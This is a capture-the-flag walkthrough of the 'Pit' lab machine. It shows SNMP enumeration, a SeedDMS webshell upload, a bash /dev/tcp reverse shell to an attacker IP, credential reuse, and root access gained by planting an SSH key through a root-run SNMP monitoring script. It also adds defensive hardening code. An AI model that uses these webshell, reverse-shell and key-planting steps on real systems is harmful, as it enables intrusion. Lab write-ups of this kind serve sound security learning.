Pit

Enumeration

As always, we start with the enumeration phase, scanning the machine for open ports and then identifying the services and versions behind them.

The following nmap command scans the whole TCP port range quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.241 -oN allPorts

  • -sS use the TCP SYN scan option. It never completes the TCP handshake, so the application behind the port never sees a connection; it is "stealthy" only in that sense, since a firewall or IDS will still log the SYNs.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

# Nmap 7.93 scan initiated Wed Apr 19 07:41:35 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.051s latency).
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (admin-prohibited)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin

# Nmap done at Wed Apr 19 07:42:01 2023 -- 1 IP address (1 host up) scanned in 26.49 seconds

Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:

nmap -sC -sV -p22,80,9090 10.10.10.241 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

# Nmap 7.93 scan initiated Wed Apr 19 07:43:17 2023 as: nmap -sCV -p22,80,9090 -Pn -n -oN targeted 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.037s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6fc3408f6950695a57d79c4e7b1b9496 (RSA)
|   256 c26ff8aba12083d160abcf632dc865b7 (ECDSA)
|_  256 6b656ca692e5cc76175a2f9ae750c350 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.93%T=SSL%I=7%D=4/19%Time=643F9BD8%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-o
SF:rigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20
SF:<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=utf
SF:-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x
SF:20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDi
SF:splay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.6666666
SF:7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#
SF:f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\
SF:x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\
SF:x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-w
SF:eight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20mar
SF:gin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20r
SF:equest\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Encod
SF:ing:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x
SF:20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Res
SF:ource-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 19 07:46:30 2023 -- 1 IP address (1 host up) scanned in 192.83 seconds

As seen in the nmap report, the TLS certificate on port 9090 names dms-pit.htb, both as commonName and in the Subject Alternative Name. Let's add it to the /etc/hosts file so the name resolves to the target.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.241    dms-pit.htb

The website on port 80 shows the default nginx test page for Red Hat Enterprise Linux.

Port 9090 serves a CentOS Linux login page over TLS (Cockpit, the Red Hat web console, listens on 9090 by default), but we don't have credentials yet.

Requesting http://dms-pit.htb/ returns a 403 instead of the default page, so nginx is selecting a different virtual host from the Host header; that vhost has content the request by IP address does not reach.

So far we have only looked at TCP. A UDP scan shows SNMP exposed on 161/udp:

nmap -sU -p- --min-rate 10000 -n -Pn -oN allPortsUDP 10.10.10.241

  • -p- scanning the entire UDP port range, from 1 to 65535.

  • -sU UDP scan.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPortsUDP file.

# Nmap 7.93 scan initiated Wed Apr 19 11:58:47 2023 as: nmap -sU -p- --min-rate 10000 -n -Pn -oN allPortsUDP 10.10.10.241
Warning: 10.10.10.241 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.241
Host is up (0.16s latency).
Not shown: 65458 open|filtered udp ports (no-response), 76 filtered udp ports (admin-prohibited)
PORT    STATE SERVICE
161/udp open  snmp

# Nmap done at Wed Apr 19 12:00:00 2023 -- 1 IP address (1 host up) scanned in 72.96 seconds

To enumerate the SNMP service with readable OID names instead of bare numbers, install the MIB files (the snmp-mibs-downloader package) and comment out the mibs : line in /etc/snmp/snmp.conf, as shown below, so that the net-snmp tools actually load them.

apt-get install snmp-mibs-downloader

nano /etc/snmp/snmp.conf

# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
# mibs :

# If you want to globally change where snmp libraries, commands and daemons
# look for MIBS, change the line below. Note you can set this for individual
# tools with the -M option or MIBDIRS environment variable.
#
# mibdirs /usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf

SNMP often leaks useful information, and here the public community string is accepted. Walking the tree with snmpwalk shows a disk monitoring entry for the path /var/www/html/seeddms51x/seeddms (a SeedDMS install under the web root) and a NET-SNMP extend entry named "monitoring" that runs /usr/bin/monitor. The output of that command includes an SELinux login mapping table, which reveals a local user named michelle.

snmpwalk -v 2c -c public 10.10.10.241 1

  • -v specifies SNMP version to use.

  • -c set the community string.

  • 1 the OID to start walking from; 1 (iso) is the root of the whole tree.

...
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
...
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
...
Login Name           SELinux User         MLS/MCS Range        Service

__default__          unconfined_u         s0-s0:c0.c1023       *
michelle             user_u               s0                   *
root                 unconfined_u         s0-s0:c0.c1023       *
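A full walk is long and the objects that matter are scattered through it. The following shell helper, added here as an example and not part of the original write-up, pulls the objects worth reading out of saved snmpwalk output: system description and contact, running processes and their arguments, disk paths, the NET-SNMP extend commands, ARP neighbours and listening ports. It matches both the MIB names (when the MIBs are installed) and the numeric prefixes you get without them. The sample input is constructed from the lines above plus a few made-up ones.

```sh
#!/bin/sh
# Added example: triage saved snmpwalk output.  Usage: snmp_triage < walk.txt

# OIDs worth reading, by MIB name and by numeric prefix (".1.3.6.1..." with -On,
# "iso.3.6.1..." when no MIBs are loaded). Numeric subtrees covered:
#   1.3.6.1.2.1.1        system          1.3.6.1.2.1.25.4.2     hrSWRunTable
#   1.3.6.1.4.1.2021.9   dskTable        1.3.6.1.4.1.8072.1.3.2 nsExtendObjects
SNMP_INTERESTING='^(SNMPv2-MIB::sys(Descr|Contact|Name|Location)|HOST-RESOURCES-MIB::hrSWRun(Name|Path|Parameters)|UCD-SNMP-MIB::dskPath|NET-SNMP-EXTEND-MIB::nsExtend|IP-MIB::ipNetToMediaPhysAddress|TCP-MIB::tcpConnLocalPort|UDP-MIB::udpLocalPort|(\.1|iso)\.3\.6\.1\.(2\.1\.1\.|2\.1\.25\.4\.2\.|4\.1\.2021\.9\.|4\.1\.8072\.1\.3\.2\.))'

# Filter stdin down to the interesting lines (exit status 1 if nothing matched).
snmp_triage() {
  grep -E "$SNMP_INTERESTING"
}

# Print "name command" for every NET-SNMP extend entry. Each of these is executed
# on the SNMP host (as the snmpd user, normally root) whenever its output is read.
snmp_extend_commands() {
  sed -n 's/^NET-SNMP-EXTEND-MIB::nsExtendCommand\."\([^"]*\)" = STRING: \(.*\)$/\1 \2/p'
}

# Constructed sample, not real output from the target, so the file runs stand-alone.
SNMP_SAMPLE='SNMPv2-MIB::sysDescr.0 = STRING: Linux host 4.18.0 #1 SMP x86_64
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
UCD-SNMP-MIB::dskDevice.2 = STRING: /dev/mapper/cl-root
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
.1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: /usr/bin/monitor
IF-MIB::ifDescr.1 = STRING: lo'

if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SNMP_SAMPLE" | snmp_triage
  printf '%s\n' "$SNMP_SAMPLE" | snmp_extend_commands
fi
```

Run it as `sh triage.sh --demo` to see the constructed sample filtered, or pipe a real walk into snmp_triage. Any nsExtendCommand hit deserves a look at the binary it names and at who can influence it, which is exactly what pays off later on this box.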

Exploitation

The http://dms-pit.htb/seeddms51x/seeddms URL shows a SeedDMS login page. With only one username known, the first thing to try is michelle as both username and password.

These credentials work. Inside we find one folder called Docs with a file called Upgrade Note in it.

Let's search for known vulnerabilities in SeedDMS.

searchsploit seeddms

--------------------------------------------------------------- ---------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) Authenticated | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting              | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting    | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting      | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution          | php/webapps/47022.txt
-------------------------------------------------------------- ----------------------
Shellcodes: No Results

Let's check the one called SeedDMS versions < 5.1.11 - Remote Command Execution.

searchsploit -x php/webapps/47022.txt

# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code:
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

So there is a way to get RCE by uploading a webshell: SeedDMS stores uploaded documents under the web root and keeps the original file extension, so nginx will execute a .php document. Let's follow the steps. First, go to the Docs folder, then into the Users folder, and then into the Michelle folder, where the option to add a new document appears.

Create a simple PHP webshell.

nano pwn.php

<?php system($_GET["cmd"]);?>

Add a new document, and upload the pwn.php webshell.

Once the webshell is uploaded, if we hover over the file, we'll see that it has the documentid 29.

Now, if we access the following URL, we'll be able to run commands on the server, for example to list the /etc/passwd file. The path is data/1048576/<document id>/<version>.<extension>: 1048576 is SeedDMS's default contentOffsetDir, 1 is the document version, and the .php extension is kept, which is what makes the upload executable.

http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat+/etc/passwd

Time to get a shell. First, set a netcat listener on port 4444, wrapped in rlwrap so the dumb reverse shell gets line editing and command history.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Now, send a reverse shell through the webshell we just uploaded. The payload travels in the query string, so every & in it has to be encoded as %26; otherwise the browser treats it as a separator between parameters and the command is cut off at the first >&.

http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.5/4444 0>%261"

Listening on 0.0.0.0 4444
Connection received on 10.10.10.241 33014
bash: cannot set terminal process group (4268): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ whoami
whoami
nginx

Privilege Escalation

There is one conf directory in /var/www/html/seeddms51x/ with a file called settings.xml.

ls -l /var/www/html/seeddms51x/conf

total 36
-r--------. 1 nginx nginx 11933 Apr 21  2020 settings.xml
-rw-r--r--. 1 nginx nginx 13771 Mar 14  2018 settings.xml.template
-rw-r--r--. 1 nginx nginx  4247 Feb 20  2013 stopwords.txt

The settings.xml file contains credentials for a MySQL database.

cat /var/www/html/seeddms51x/conf/settings.xml

...
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
...

The database password is worth trying elsewhere. Logging in on https://dms-pit.htb:9090 as michelle with the password from settings.xml works: the credential is reused for her system account.

The web console has a section called Terminal, which gives a browser shell running as michelle. From there we can grab the user flag.

Let's investigate what is exactly /usr/bin/monitor.

cat /usr/bin/monitor

#!/bin/bash

for script in /usr/local/monitoring/check*sh
do
    /bin/bash $script
done

It runs, with /bin/bash, every file in /usr/local/monitoring/ whose name starts with check and ends with sh. Since snmpd runs as root, the extend command and every script it picks up run as root too. Let's see what privileges we have on that directory.

getfacl /usr/local/monitoring/

getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---

The ACL entry user:michelle:-wx gives michelle write and execute on the directory but not read, so she can create files in it even though she cannot list it, and the glob does not care who owns the script. We could create a new script named check_alfa8sa.sh which inserts our public SSH key into root's authorized_keys file. First, grab our public SSH key.

cat ~/.ssh/id_rsa.pub

ssh-rsa AAAAB3...EmDKbTo50= root@alfa8sa

Then, create the check_alfa8sa.sh inside /usr/local/monitoring/ with the following code.

vi /usr/local/monitoring/check_alfa8sa.sh

#!/bin/bash
# Runs as root via snmpd -> /usr/bin/monitor; append so any existing keys survive.
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3...EmDKbTo50= root@alfa8sa" >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh; chmod 600 /root/.ssh/authorized_keys

Now, to trigger the script, query the extend objects again: snmpd runs /usr/bin/monitor each time the NET-SNMP-EXTEND-MIB output objects are read, so a second snmpwalk is enough.

snmpwalk -v 2c -c public 10.10.10.241 1

  • -v specifies SNMP version to use.

  • -c set the community string.

  • 1 set OID.

Now we should be able to log in via SSH as root without a password. Then, all we have to do is reap the harvest and take the root flag.

ssh root@10.10.10.241

Web console: https://pit.htb:9090/

Last login: Thu Apr 20 04:38:40 2023 from 10.10.14.5
[root@pit ~]# whoami
root
[root@pit ~]# cat root.txt 
d670f6f678082e3a03e5a0afc3efec9b
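The root cause is worth stating plainly: snmpd runs an extend command as root, that command globs a directory, and an ACL lets an unprivileged user write into that directory, so the mode bits a root admin would glance at (rwxrwx---) do not tell the whole story. Below is a hardened version of /usr/bin/monitor, added here as an example and not the box's script, that refuses to run anything unless the directory and each script are owned by the expected user, are not group- or world-writable, and carry no extended ACL (the trailing + that ls -l prints when getfacl has more to say). MON_DIR and MON_OWNER are assumed environment overrides so it can be exercised in a scratch directory.

```sh
#!/bin/sh
# Added example: hardened replacement for /usr/bin/monitor. The original is simply
#     for script in /usr/local/monitoring/check*sh; do /bin/bash $script; done
# run as root by snmpd, which trusts whatever the glob finds.

MON_DIR=${MON_DIR:-/usr/local/monitoring}
MON_OWNER=${MON_OWNER:-root}

# safe_path PATH: succeed only if PATH is owned by MON_OWNER, is not group- or
# world-writable, and has no extended ACL. The "ls -ld" mode string is used because
# it is portable and ends in "+" when an ACL grants more than the bits show.
safe_path() {
  set -- "$(ls -ld "$1")"          # e.g. "drwxrwx---+ 2 root root 4096 ... /usr/local/monitoring"
  mode=${1%% *}
  owner=$(printf '%s\n' "$1" | awk '{print $3}')
  [ "$owner" = "$MON_OWNER" ] || return 1
  case $mode in
    *+)          return 1 ;;        # extended ACL present: run getfacl before trusting it
    ?????w*)     return 1 ;;        # group-writable
    ????????w*)  return 1 ;;        # world-writable
  esac
  return 0
}

# run_checks: execute the check*sh scripts, skipping anything that fails safe_path.
# Returns 2 without running anything if the directory itself is untrustworthy.
run_checks() {
  if ! safe_path "$MON_DIR"; then
    echo "monitor: refusing to run, $MON_DIR is writable by others or carries an ACL" >&2
    return 2
  fi
  for script in "$MON_DIR"/check*sh; do
    [ -f "$script" ] || continue    # glob matched nothing
    if safe_path "$script"; then
      bash "$script"
    else
      echo "monitor: skipping untrusted $script" >&2
    fi
  done
}

# Entry point when installed as the real script. With the ACL seen on the box,
# run_checks refuses outright instead of executing michelle's check_alfa8sa.sh as root.
if [ "${1:-}" = "--run" ]; then
  run_checks
fi
```

The other half of the fix is outside the script: drop the ACL (setfacl -x u:michelle /usr/local/monitoring) or, better, do not let an SNMP extend command run as root at all, since anyone holding the community string can trigger it remotely.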
